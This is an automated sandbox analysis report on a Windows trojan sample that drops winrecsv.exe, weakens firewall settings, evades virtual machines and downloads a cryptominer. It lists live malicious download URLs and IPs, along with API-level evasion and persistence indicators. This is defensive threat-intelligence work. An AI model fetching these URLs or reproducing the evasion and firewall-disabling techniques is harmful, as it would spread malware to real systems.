                          Source: C:\Users\user\AppData\Local\Temp\509517324.exeThread delayed: delay time: 225895Jump to behavior
                          Source: C:\Users\user\Desktop\Id4zlrsrZ4.exeEvaded block: after key decisiongraph_0-4341
                          Source: C:\Windows\winrecsv.exeEvaded block: after key decisiongraph_1-4253
                          Source: C:\Users\user\Desktop\Id4zlrsrZ4.exeEvasive API call chain: RegOpenKey,DecisionNodes,Sleepgraph_0-4267
                          Source: C:\Windows\winrecsv.exeEvasive API call chain: RegQueryValue,DecisionNodes,Sleep
                          Source: C:\Windows\winrecsv.exeEvasive API call chain: RegOpenKey,DecisionNodes,Sleepgraph_1-4267
                          Source: C:\Users\user\Desktop\Id4zlrsrZ4.exeAPI coverage: 3.4 %
                          Source: C:\Windows\winrecsv.exeAPI coverage: 1.2 %
                          Source: C:\Windows\winrecsv.exeCode function: 5_2_0040B8F05_2_0040B8F0
                          Source: C:\Users\user\Desktop\Id4zlrsrZ4.exeCode function: 0_2_0040B8F00_2_0040B8F0
                          Source: C:\Users\user\Desktop\Id4zlrsrZ4.exeCode function: 0_2_0040EEA0 GetSystemInfo,InitializeCriticalSection,CreateEventA,CreateIoCompletionPort,WSASocketA,setsockopt,htons,bind,listen,WSACreateEvent,WSAEventSelect,0_2_0040EEA0
                          Source: C:\Users\user\Desktop\Id4zlrsrZ4.exeCode function: 0_2_00404A90 CreateDirectoryW,wsprintfW,FindFirstFileW,lstrcmpW,lstrcmpW,wsprintfW,wsprintfW,MoveFileExW,FindNextFileW,FindClose,RemoveDirectoryW,0_2_00404A90
                          Source: C:\Users\user\Desktop\Id4zlrsrZ4.exeCode function: 0_2_00404BD0 _chkstk,wsprintfW,wsprintfW,wsprintfW,wsprintfW,wsprintfW,PathFileExistsW,SetFileAttributesW,DeleteFileW,PathFileExistsW,PathFileExistsW,CreateDirectoryW,SetFileAttributesW,PathFileExistsW,CopyFileW,SetFileAttributesW,PathFileExistsW,SetFileAttributesW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcmpiW,PathMatchSpecW,wsprintfW,SetFileAttributesW,DeleteFileW,PathFileExistsW,wsprintfW,wsprintfW,MoveFileExW,FindNextFileW,FindClose,0_2_00404BD0
                          Source: C:\Windows\winrecsv.exeCode function: 1_2_00404A90 CreateDirectoryW,wsprintfW,FindFirstFileW,lstrcmpW,lstrcmpW,wsprintfW,wsprintfW,MoveFileExW,FindNextFileW,FindClose,RemoveDirectoryW,1_2_00404A90
                          Source: C:\Windows\winrecsv.exeCode function: 1_2_00404BD0 _chkstk,wsprintfW,wsprintfW,wsprintfW,wsprintfW,wsprintfW,PathFileExistsW,SetFileAttributesW,DeleteFileW,PathFileExistsW,PathFileExistsW,CreateDirectoryW,SetFileAttributesW,PathFileExistsW,CopyFileW,SetFileAttributesW,PathFileExistsW,SetFileAttributesW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcmpiW,PathMatchSpecW,wsprintfW,SetFileAttributesW,DeleteFileW,PathFileExistsW,wsprintfW,wsprintfW,MoveFileExW,FindNextFileW,FindClose,1_2_00404BD0
                          Source: C:\Windows\winrecsv.exeCode function: 5_2_00404A90 CreateDirectoryW,wsprintfW,FindFirstFileW,lstrcmpW,lstrcmpW,wsprintfW,wsprintfW,MoveFileExW,FindNextFileW,FindClose,RemoveDirectoryW,5_2_00404A90
                          Source: C:\Windows\winrecsv.exeCode function: 5_2_00404BD0 _chkstk,wsprintfW,wsprintfW,wsprintfW,wsprintfW,wsprintfW,PathFileExistsW,SetFileAttributesW,DeleteFileW,PathFileExistsW,PathFileExistsW,CreateDirectoryW,SetFileAttributesW,PathFileExistsW,CopyFileW,SetFileAttributesW,PathFileExistsW,SetFileAttributesW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcmpiW,PathMatchSpecW,wsprintfW,SetFileAttributesW,DeleteFileW,PathFileExistsW,wsprintfW,wsprintfW,MoveFileExW,FindNextFileW,FindClose,5_2_00404BD0
                          Source: C:\Windows\winrecsv.exeThread delayed: delay time: 900000Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\509517324.exeThread delayed: delay time: 263395Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\509517324.exeThread delayed: delay time: 225895Jump to behavior
                          Source: C:\Users\user\Desktop\Id4zlrsrZ4.exeAPI call chain: ExitProcess graph end nodegraph_0-4254
                          Source: C:\Users\user\Desktop\Id4zlrsrZ4.exeAPI call chain: ExitProcess graph end nodegraph_0-4279
                          Source: C:\Windows\winrecsv.exeAPI call chain: ExitProcess graph end nodegraph_1-4279
                          Source: C:\Windows\winrecsv.exeAPI call chain: ExitProcess graph end nodegraph_1-4314
                          Source: C:\Windows\winrecsv.exeAPI call chain: ExitProcess graph end node
                          Source: C:\Windows\winrecsv.exeAPI call chain: ExitProcess graph end node
                          Source: C:\Windows\winrecsv.exeAPI call chain: ExitProcess graph end node
                          Source: Amcache.hve.7.drBinary or memory string: VMware
                          Source: Amcache.hve.7.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/5&1ec51bf7&0&000000
                          Source: Amcache.hve.7.drBinary or memory string: @scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/5&280b647&0&000000
                          Source: Amcache.hve.7.drBinary or memory string: VMware Virtual USB Mouse
                          Source: 509517324.exe, 00000007.00000002.420283496.000000000122F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWZ
                          Source: Amcache.hve.7.drBinary or memory string: VMware, Inc.
                          Source: Amcache.hve.7.drBinary or memory string: VMware Virtual disk SCSI Disk Devicehbin
                          Source: Amcache.hve.7.drBinary or memory string: Microsoft Hyper-V Generation Counter
                          Source: Amcache.hve.7.drBinary or memory string: VMware7,1
                          Source: Amcache.hve.7.drBinary or memory string: NECVMWar VMware SATA CD00
                          Source: Amcache.hve.7.drBinary or memory string: VMware Virtual disk SCSI Disk Device
                          Source: Amcache.hve.7.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW71.00V.13989454.B64.1906190538,BiosReleaseDate:06/19/2019,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware7,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
                          Source: 509517324.exe, 00000007.00000002.420283496.000000000122F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                          Source: Amcache.hve.7.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
                          Source: Amcache.hve.7.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
                          Source: Amcache.hve.7.drBinary or memory string: VMware, Inc.me
                          Source: 509517324.exe, 00000007.00000002.420271661.0000000001228000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}{
                          Source: Amcache.hve.7.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/5&280b647&0&000000
                          Source: 509517324.exe, 00000007.00000002.420271661.0000000001228000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
                          Source: Amcache.hve.7.drBinary or memory string: VMware-42 35 44 6e 75 85 11 47-bd a2 bb ed 21 43 9f 89
                          Source: 509517324.exe, 00000007.00000002.420240113.0000000001203000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW`[#
                          Source: Amcache.hve.7.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/5&1ec51bf7&0&000000
                          Source: C:\Users\user\Desktop\Id4zlrsrZ4.exeCode function: 0_2_00408C70 GetProcessHeaps,0_2_00408C70
                          Source: C:\Users\user\Desktop\Id4zlrsrZ4.exeCode function: GetLocaleInfoA,0_2_0040D4A0
                          Source: C:\Windows\winrecsv.exeCode function: GetLocaleInfoA,1_2_0040D4A0
                          Source: C:\Windows\winrecsv.exeCode function: GetLocaleInfoA,5_2_0040D4A0

                          Lowering of HIPS / PFW / Operating System Security Settings

                          barindex
                          Source: C:\Windows\winrecsv.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center FirewallOverrideJump to behavior
                          Source: Amcache.hve.7.drBinary or memory string: c:\program files\windows defender\msmpeng.exe

                          Remote Access Functionality

                          barindex
                          Source: Yara matchFile source: Id4zlrsrZ4.exe, type: SAMPLE
                          Source: Yara matchFile source: 5.0.winrecsv.exe.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 1.0.winrecsv.exe.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0.0.Id4zlrsrZ4.exe.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 5.2.winrecsv.exe.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 1.2.winrecsv.exe.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0.2.Id4zlrsrZ4.exe.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 00000001.00000002.347600156.0000000000410000.00000002.00000001.01000000.00000004.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000000.00000000.339631076.0000000000410000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000000.00000003.345540148.0000000000733000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000005.00000000.377037453.0000000000410000.00000002.00000001.01000000.00000004.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000001.00000000.345529527.0000000000410000.00000002.00000001.01000000.00000004.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000005.00000002.606945122.0000000000410000.00000002.00000001.01000000.00000004.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000000.00000002.348024370.0000000000410000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: Id4zlrsrZ4.exe PID: 6224, type: MEMORYSTR
                          Source: Yara matchFile source: Process Memory Space: winrecsv.exe PID: 6244, type: MEMORYSTR
                          Source: Yara matchFile source: Process Memory Space: winrecsv.exe PID: 6516, type: MEMORYSTR
                          Source: Yara matchFile source: C:\Windows\winrecsv.exe, type: DROPPED
                          Source: C:\Users\user\Desktop\Id4zlrsrZ4.exeCode function: 0_2_0040DC40 CreateEventA,socket,htons,setsockopt,bind,CreateThread,0_2_0040DC40
                          Source: C:\Users\user\Desktop\Id4zlrsrZ4.exeCode function: 0_2_0040EEA0 GetSystemInfo,InitializeCriticalSection,CreateEventA,CreateIoCompletionPort,WSASocketA,setsockopt,htons,bind,listen,WSACreateEvent,WSAEventSelect,0_2_0040EEA0
                          Source: C:\Users\user\Desktop\Id4zlrsrZ4.exeCode function: 0_2_0040E110 CreateEventA,socket,bind,CreateThread,0_2_0040E110
                          Source: C:\Users\user\Desktop\Id4zlrsrZ4.exeCode function: 0_2_0040C930 socket,htons,inet_addr,setsockopt,bind,lstrlenA,sendto,ioctlsocket,0_2_0040C930
                          Source: C:\Windows\winrecsv.exeCode function: 1_2_0040DC40 CreateEventA,socket,htons,setsockopt,bind,CreateThread,1_2_0040DC40
                          Source: C:\Windows\winrecsv.exeCode function: 1_2_0040EEA0 GetSystemInfo,InitializeCriticalSection,CreateEventA,CreateIoCompletionPort,WSASocketA,setsockopt,htons,bind,listen,WSACreateEvent,WSAEventSelect,1_2_0040EEA0
                          Source: C:\Windows\winrecsv.exeCode function: 1_2_0040E110 CreateEventA,socket,bind,CreateThread,1_2_0040E110
                          Source: C:\Windows\winrecsv.exeCode function: 1_2_0040C930 socket,htons,inet_addr,setsockopt,bind,lstrlenA,sendto,ioctlsocket,1_2_0040C930
                          Source: C:\Windows\winrecsv.exeCode function: 5_2_0040DC40 CreateEventA,socket,htons,setsockopt,bind,CreateThread,5_2_0040DC40
                          Source: C:\Windows\winrecsv.exeCode function: 5_2_0040EEA0 GetSystemInfo,InitializeCriticalSection,CreateEventA,CreateIoCompletionPort,WSASocketA,setsockopt,htons,bind,listen,WSACreateEvent,WSAEventSelect,5_2_0040EEA0
                          Source: C:\Windows\winrecsv.exeCode function: 5_2_0040E110 CreateEventA,socket,bind,CreateThread,5_2_0040E110
                          Source: C:\Windows\winrecsv.exeCode function: 5_2_0040C930 socket,htons,inet_addr,setsockopt,bind,lstrlenA,sendto,ioctlsocket,5_2_0040C930
                          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                          Valid Accounts11
                          Native API
                          Path Interception1
                          Process Injection
                          121
                          Masquerading
                          21
                          Input Capture
                          231
                          Security Software Discovery
                          Remote Services21
                          Input Capture
                          Exfiltration Over Other Network Medium2
                          Encrypted Channel
                          Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                          Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
                          Disable or Modify Tools
                          LSASS Memory21
                          Virtualization/Sandbox Evasion
                          Remote Desktop Protocol1
                          Archive Collected Data
                          Exfiltration Over Bluetooth1
                          Non-Standard Port
                          Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                          Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)21
                          Virtualization/Sandbox Evasion
                          Security Account Manager1
                          Remote System Discovery
                          SMB/Windows Admin Shares2
                          Clipboard Data
                          Automated Exfiltration4
                          Ingress Tool Transfer
                          Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)1
                          Process Injection
                          NTDS1
                          System Network Connections Discovery
                          Distributed Component Object ModelInput CaptureScheduled Transfer2
                          Non-Application Layer Protocol
                          SIM Card SwapCarrier Billing Fraud
                          Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
                          Hidden Files and Directories
                          LSA Secrets2
                          File and Directory Discovery
                          SSHKeyloggingData Transfer Size Limits12
                          Application Layer Protocol
                          Manipulate Device CommunicationManipulate App Store Rankings or Ratings
                          Replication Through Removable MediaLaunchdRc.commonRc.commonSteganographyCached Domain Credentials13
                          System Information Discovery
                          VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                          Hide Legend

                          Legend:

                          • Process
                          • Signature
                          • Created File
                          • DNS/IP Info
                          • Is Dropped
                          • Is Windows Process
                          • Number of created Registry Values
                          • Number of created Files
                          • Visual Basic
                          • Delphi
                          • Java
                          • .Net C# or VB.NET
                          • C, C++ or other language
                          • Is malicious
                          • Internet
                          behaviorgraph top1 signatures2 2 Behavior Graph ID: 684211 Sample: Id4zlrsrZ4.exe Startdate: 15/08/2022 Architecture: WINDOWS Score: 100 31 Multi AV Scanner detection for domain / URL 2->31 33 Antivirus detection for URL or domain 2->33 35 Antivirus / Scanner detection for submitted sample 2->35 37 4 other signatures 2->37 6 Id4zlrsrZ4.exe 1 1 2->6         started        10 winrecsv.exe 8 16 2->10         started        process3 dnsIp4 19 C:\Windows\winrecsv.exe, PE32 6->19 dropped 39 Found evasive API chain (may stop execution after checking mutex) 6->39 41 Contains functionality to check if Internet connection is working 6->41 43 Drops executables to the windows directory (C:\Windows) and starts them 6->43 45 Contains functionality to detect sleep reduction / modifications 6->45 13 winrecsv.exe 6->13         started        25 185.215.113.66, 49762, 49763, 49778 WHOLESALECONNECTIONSNL Portugal 10->25 27 176.194.22.84, 40500 TI-ASMoscowRussiaRU Russian Federation 10->27 29 4 other IPs or domains 10->29 21 C:\Users\user\AppData\Local\...\509517324.exe, PE32 10->21 dropped 47 Changes security center settings (notifications, updates, antivirus, firewall) 10->47 49 Hides that the sample has been downloaded from the Internet (zone.identifier) 10->49 16 509517324.exe 14 10->16         started        file5 signatures6 process7 dnsIp8 51 Antivirus detection for dropped file 13->51 53 Multi AV Scanner detection for dropped file 13->53 55 Found evasive API chain (may stop execution after checking mutex) 13->55 63 2 other signatures 13->63 23 185.215.113.84, 49765, 49767, 80 WHOLESALECONNECTIONSNL Portugal 16->23 57 Creates HTML files with .exe extension (expired dropper behavior) 16->57 59 Machine Learning detection for dropped file 16->59 61 Hides that the sample has been downloaded from the Internet (zone.identifier) 16->61 signatures9

                          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                          windows-stand
                          SourceDetectionScannerLabelLink
                          Id4zlrsrZ4.exe70%VirustotalBrowse
                          Id4zlrsrZ4.exe74%ReversingLabsWin32.Trojan.FWDisable
                          Id4zlrsrZ4.exe100%AviraHEUR/AGEN.1237550
                          Id4zlrsrZ4.exe100%Joe Sandbox ML
                          SourceDetectionScannerLabelLink
                          C:\Windows\winrecsv.exe100%AviraHEUR/AGEN.1237550
                          C:\Users\user\AppData\Local\Temp\509517324.exe100%AviraTR/Crypt.XPACK.Gen
                          C:\Windows\winrecsv.exe100%Joe Sandbox ML
                          C:\Users\user\AppData\Local\Temp\509517324.exe100%Joe Sandbox ML
                          C:\Users\user\AppData\Local\Temp\509517324.exe52%MetadefenderBrowse
                          C:\Users\user\AppData\Local\Temp\509517324.exe88%ReversingLabsWin32.Trojan.Donut
                          C:\Windows\winrecsv.exe74%ReversingLabsWin32.Trojan.FWDisable
                          SourceDetectionScannerLabelLinkDownload
                          0.2.Id4zlrsrZ4.exe.400000.0.unpack100%AviraHEUR/AGEN.1237550Download File
                          7.0.509517324.exe.10d0000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                          5.2.winrecsv.exe.400000.0.unpack100%AviraHEUR/AGEN.1237550Download File
                          5.0.winrecsv.exe.400000.0.unpack100%AviraHEUR/AGEN.1237550Download File
                          1.0.winrecsv.exe.400000.0.unpack100%AviraHEUR/AGEN.1237550Download File
                          1.2.winrecsv.exe.400000.0.unpack100%AviraHEUR/AGEN.1237550Download File
                          0.0.Id4zlrsrZ4.exe.400000.0.unpack100%AviraHEUR/AGEN.1237550Download File
                          7.2.509517324.exe.10d0000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                          No Antivirus matches
                          SourceDetectionScannerLabelLink
                          http://185.215.113.66/twizt/3Strong100%Avira URL Cloudmalware
                          http://185.215.113.66/twizt/984658winrecsv.exeWindows100%Avira URL Cloudmalware
                          http://185.215.113.84/xmrminer.exe15%VirustotalBrowse
                          http://185.215.113.84/xmrminer.exe100%Avira URL Cloudmalware
                          http://185.215.113.84/xmrminer.exeBLk100%Avira URL Cloudmalware
                          http://185.215.113.66/twizt/1NNC:100%Avira URL Cloudmalware
                          http://185.215.113.66/twizt/3l=8100%Avira URL Cloudmalware
                          http://185.215.113.66/twizt/4lH9100%Avira URL Cloudmalware
                          http://2462462645.fr/0%Avira URL Cloudsafe
                          http://185.215.113.66/twizt/6k8100%Avira URL Cloudmalware
                          http://185.215.113.66/twizt/100%Avira URL Cloudmalware
                          http://185.215.113.84/xmrminer.exe(100%Avira URL Cloudmalware
                          http://2462462645.fr/5797957298589274527842dgd828d8g8fg8g8gfeu8gf8g2gf8g2fgaefafugaugfgauegfaefyaieg0%Avira URL Cloudsafe
                          http://185.215.113.66/twizt/3lZ9100%Avira URL Cloudmalware
                          http://185.215.113.66/twizt/15C5FCA7100%Avira URL Cloudmalware
                          http://185.215.113.66/twizt/3l100%Avira URL Cloudmalware
                          http://185.215.113.66/twizt/6lS9100%Avira URL Cloudmalware
                          http://185.215.113.84/xmrminer.exer100%Avira URL Cloudmalware
                          http://185.215.113.84/xmrminer.exes100%Avira URL Cloudmalware
                          http://185.215.113.66/B1-4D5E-B0E7-362EE23EA443100%Avira URL Cloudmalware
                          http://185.215.113.66/twizt/5#8u100%Avira URL Cloudmalware
                          http://185.215.113.66/twizt/19100%Avira URL Cloudmalware
                          http://185.215.113.84/xmrminer.exe~100%Avira URL Cloudmalware
                          http://185.215.113.66/100%Avira URL Cloudmalware
                          http://185.215.113.66/twizt/6100%Avira URL Cloudmalware
                          http://185.215.113.66/twizt/5100%Avira URL Cloudmalware
                          http://185.215.113.66/twizt/2100%Avira URL Cloudmalware
                          http://185.215.113.66/twizt/1100%Avira URL Cloudmalware
                          http://185.215.113.84/xmrminer.exero/100%Avira URL Cloudmalware
                          http://185.215.113.66/twizt/4100%Avira URL Cloudmalware
                          http://185.215.113.66/twizt/3100%Avira URL Cloudmalware
                          http://185.215.113.66/twizt/3E8100%Avira URL Cloudmalware
                          No contacted domains info
                          NameMaliciousAntivirus DetectionReputation
                          http://185.215.113.84/xmrminer.exetrue
                          • 15%, Virustotal, Browse
                          • Avira URL Cloud: malware
                          unknown
                          http://185.215.113.66/twizt/6true
                          • Avira URL Cloud: malware
                          unknown
                          http://185.215.113.66/twizt/5true
                          • Avira URL Cloud: malware
                          unknown
                          http://185.215.113.66/twizt/2true
                          • Avira URL Cloud: malware
                          unknown
                          http://185.215.113.66/twizt/1true
                          • Avira URL Cloud: malware
                          unknown
                          http://185.215.113.66/twizt/4true
                          • Avira URL Cloud: malware
                          unknown
                          http://185.215.113.66/twizt/3true
                          • Avira URL Cloud: malware
                          unknown
                          NameSourceMaliciousAntivirus DetectionReputation
                          http://185.215.113.66/twizt/3Strongwinrecsv.exe, 00000005.00000003.448558044.00000000031AD000.00000004.00000800.00020000.00000000.sdmptrue
                          • Avira URL Cloud: malware
                          unknown
                          http://185.215.113.66/twizt/984658winrecsv.exeWindowsId4zlrsrZ4.exe, winrecsv.exe.0.drtrue
                          • Avira URL Cloud: malware
                          unknown
                          http://185.215.113.84/xmrminer.exeBLk509517324.exe, 00000007.00000002.420296695.000000000123D000.00000004.00000020.00020000.00000000.sdmptrue
                          • Avira URL Cloud: malware
                          unknown
                          http://schemas.xmlsoap.org/soap/encoding/winrecsv.exe.0.drfalse
                            high
                            http://185.215.113.66/twizt/1NNC:winrecsv.exe, 00000005.00000003.389365979.0000000003153000.00000004.00000800.00020000.00000000.sdmptrue
                            • Avira URL Cloud: malware
                            unknown
                            http://185.215.113.66/twizt/3l=8winrecsv.exe, 00000005.00000002.607788746.0000000003181000.00000004.00000800.00020000.00000000.sdmptrue
                            • Avira URL Cloud: malware
                            unknown
                            http://185.215.113.66/twizt/4lH9winrecsv.exe, 00000005.00000002.607788746.0000000003181000.00000004.00000800.00020000.00000000.sdmptrue
                            • Avira URL Cloud: malware
                            unknown
                            http://2462462645.fr/winrecsv.exe, winrecsv.exe, 00000005.00000002.606960359.0000000000413000.00000004.00000001.01000000.00000004.sdmp, winrecsv.exe, 00000005.00000000.377043204.0000000000413000.00000008.00000001.01000000.00000004.sdmp, Id4zlrsrZ4.exe, winrecsv.exe.0.drfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://schemas.xmlsoap.org/soap/envelope/winrecsv.exe.0.drfalse
                              high
                              http://185.215.113.66/twizt/6k8winrecsv.exe, 00000005.00000002.607788746.0000000003181000.00000004.00000800.00020000.00000000.sdmptrue
                              • Avira URL Cloud: malware
                              unknown
                              http://185.215.113.66/twizt/winrecsv.exe, winrecsv.exe, 00000005.00000002.606960359.0000000000413000.00000004.00000001.01000000.00000004.sdmp, winrecsv.exe, 00000005.00000000.377043204.0000000000413000.00000008.00000001.01000000.00000004.sdmp, Id4zlrsrZ4.exe, winrecsv.exe.0.drtrue
                              • Avira URL Cloud: malware
                              unknown
                              http://upx.sf.netAmcache.hve.7.drfalse
                                high
                                http://185.215.113.84/xmrminer.exe(509517324.exe, 00000007.00000002.420240113.0000000001203000.00000004.00000020.00020000.00000000.sdmptrue
                                • Avira URL Cloud: malware
                                unknown
                                http://2462462645.fr/5797957298589274527842dgd828d8g8fg8g8gfeu8gf8g2gf8g2fgaefafugaugfgauegfaefyaiegId4zlrsrZ4.exe, winrecsv.exe.0.drfalse
                                • Avira URL Cloud: safe
                                unknown
                                http://185.215.113.66/twizt/3lZ9winrecsv.exe, 00000005.00000002.607788746.0000000003181000.00000004.00000800.00020000.00000000.sdmptrue
                                • Avira URL Cloud: malware
                                unknown
                                http://185.215.113.66/twizt/15C5FCA7winrecsv.exe, 00000005.00000003.389375637.0000000003171000.00000004.00000800.00020000.00000000.sdmp, winrecsv.exe, 00000005.00000003.389646709.00000000031A9000.00000004.00000800.00020000.00000000.sdmp, winrecsv.exe, 00000005.00000003.389630272.0000000003199000.00000004.00000800.00020000.00000000.sdmp, winrecsv.exe, 00000005.00000003.389653445.00000000031AC000.00000004.00000800.00020000.00000000.sdmp, winrecsv.exe, 00000005.00000003.389580007.0000000003192000.00000004.00000800.00020000.00000000.sdmptrue
                                • Avira URL Cloud: malware
                                unknown
                                http://185.215.113.66/twizt/3lwinrecsv.exe, 00000005.00000002.607788746.0000000003181000.00000004.00000800.00020000.00000000.sdmptrue
                                • Avira URL Cloud: malware
                                unknown
                                http://185.215.113.66/twizt/6lS9winrecsv.exe, 00000005.00000002.607788746.0000000003181000.00000004.00000800.00020000.00000000.sdmptrue
                                • Avira URL Cloud: malware
                                unknown
                                http://185.215.113.84/xmrminer.exer509517324.exe, 00000007.00000002.420240113.0000000001203000.00000004.00000020.00020000.00000000.sdmptrue
                                • Avira URL Cloud: malware
                                unknown
                                http://185.215.113.84/xmrminer.exes509517324.exe, 00000007.00000002.420203300.00000000011DA000.00000004.00000020.00020000.00000000.sdmptrue
                                • Avira URL Cloud: malware
                                unknown
                                http://185.215.113.66/B1-4D5E-B0E7-362EE23EA443winrecsv.exe, 00000005.00000003.448558044.00000000031AD000.00000004.00000800.00020000.00000000.sdmp, winrecsv.exe, 00000005.00000002.607849119.00000000031AD000.00000004.00000800.00020000.00000000.sdmptrue
                                • Avira URL Cloud: malware
                                unknown
                                http://185.215.113.66/twizt/5#8uwinrecsv.exe, 00000005.00000002.607788746.0000000003181000.00000004.00000800.00020000.00000000.sdmptrue
                                • Avira URL Cloud: malware
                                unknown
                                http://185.215.113.66/twizt/19winrecsv.exe, 00000005.00000003.389375637.0000000003171000.00000004.00000800.00020000.00000000.sdmp, winrecsv.exe, 00000005.00000003.389739491.000000000317E000.00000004.00000800.00020000.00000000.sdmptrue
                                • Avira URL Cloud: malware
                                unknown
                                http://185.215.113.84/xmrminer.exe~509517324.exe, 00000007.00000002.420240113.0000000001203000.00000004.00000020.00020000.00000000.sdmptrue
                                • Avira URL Cloud: malware
                                unknown
                                http://185.215.113.66/winrecsv.exe, 00000005.00000003.448558044.00000000031AD000.00000004.00000800.00020000.00000000.sdmp, winrecsv.exe, 00000005.00000002.607849119.00000000031AD000.00000004.00000800.00020000.00000000.sdmptrue
                                • Avira URL Cloud: malware
                                unknown
                                http://185.215.113.84/xmrminer.exero/509517324.exe, 00000007.00000002.420296695.000000000123D000.00000004.00000020.00020000.00000000.sdmptrue
                                • Avira URL Cloud: malware
                                unknown
                                http://185.215.113.66/twizt/3E8winrecsv.exe, 00000005.00000002.607788746.0000000003181000.00000004.00000800.00020000.00000000.sdmptrue
                                • Avira URL Cloud: malware
                                unknown
                                • No. of IPs < 25%
                                • 25% < No. of IPs < 50%
                                • 50% < No. of IPs < 75%
                                • 75% < No. of IPs
                                IPDomainCountryFlagASNASN NameMalicious
                                185.215.113.66
                                unknownPortugal
                                206894WHOLESALECONNECTIONSNLfalse
                                105.106.149.0
                                unknownAlgeria
                                36947ALGTEL-ASDZfalse
                                239.255.255.250
                                unknownReserved
                                unknownunknownfalse
                                176.194.22.84
                                unknownRussian Federation
                                12714TI-ASMoscowRussiaRUfalse
                                185.215.113.84
                                unknownPortugal
                                206894WHOLESALECONNECTIONSNLtrue
                                89.236.217.87
                                unknownUzbekistan
                                39032ISPETCUZfalse
                                IP
                                192.168.2.1
                                Joe Sandbox Version:35.0.0 Citrine
                                Analysis ID:684211
                                Start date and time:2022-08-15 18:30:01 +02:00
                                Joe Sandbox Product:CloudBasic
                                Overall analysis duration:0h 7m 46s
                                Hypervisor based Inspection enabled:false
                                Report type:full
                                Sample file name:Id4zlrsrZ4.exe
                                Cookbook file name:default.jbs
                                Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                Number of analysed new started processes analysed:20
                                Number of new started drivers analysed:0
                                Number of existing processes analysed:0
                                Number of existing drivers analysed:0
                                Number of injected processes analysed:0
                                Technologies:
                                • HCA enabled
                                • EGA enabled
                                • HDC enabled
                                • AMSI enabled
                                Analysis Mode:default
                                Analysis stop reason:Timeout
                                Detection:MAL
                                Classification:mal100.troj.evad.mine.winEXE@8/7@0/7
                                EGA Information:
                                • Successful, ratio: 100%
                                HDC Information:
                                • Successful, ratio: 99.3% (good quality ratio 94.6%)
                                • Quality average: 83.4%
                                • Quality standard deviation: 26.4%
                                HCA Information:
                                • Successful, ratio: 100%
                                • Number of executed functions: 53
                                • Number of non-executed functions: 138
                                Cookbook Comments:
                                • Found application associated with file extension: .exe
                                • Adjust boot time
                                • Enable AMSI
                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, wuapihost.exe
                                • Excluded IPs from analysis (whitelisted): 23.211.6.115, 20.109.209.108
